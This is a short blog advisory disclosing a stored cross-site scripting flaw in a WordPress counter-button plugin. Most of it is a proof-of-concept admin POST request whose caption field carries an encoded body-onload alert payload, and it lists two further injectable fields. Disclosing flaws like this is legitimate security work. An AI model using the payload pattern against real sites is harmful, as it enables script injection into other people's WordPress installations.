Tuesday, 25 February 2014

[EN] Wordpress plugin Thanks You Counter Button vulnerable to XSS

# ==============================================================
# Title ...| Thanks You Counter Button XSS
# Version .| thanks-you-counter-button 1.8.7
# Date ....| 23.02.2014
# Found ...| HauntIT Blog
# Home ....| http://www.wordpress.org/plugins/
# ==============================================================


# ==============================================================
# XSS

---<request>---
POST /k/wordpress/wp-admin/options.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 806

option_page=thankyoubutton-options&action=update&_wpnonce=ed03a9f018&_wp_http_referer=%2Fk%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Dthankyou.php&thanks_display_page=1&thanks_display_home=1&thanks_position_firstpageonly=1&thanks_position_lastpageonly=1&thanks_caption='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&thanks_style=float%3A+left%3B+margin-right%3A+10px%3B&thanks_caption_style=font-family%3A+Verdana%2C+Arial%2C+Sans-Serif%3B+font-size%3A+14px%3B+font-weight%3A+normal%3B&thanks_caption_color=%23ffffff&thanks_size=large&thanks_form=rounded&thanks_color=blue&thanks_custom_url=&thanks_custom_glow_url=&thanks_custom_width=100&thanks_custom_height=26&thanks_check_ip_address=1&thanks_time_limit%5B%5D=1&thanks_time_limit_seconds=60&thanks_display_settings_shortcuts=1&submit=Save+Changes
---<request>---

[+] Also vulnerable are: thanks_caption_style, thanks_style


# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/

No comments:

Post a comment

What do You think...?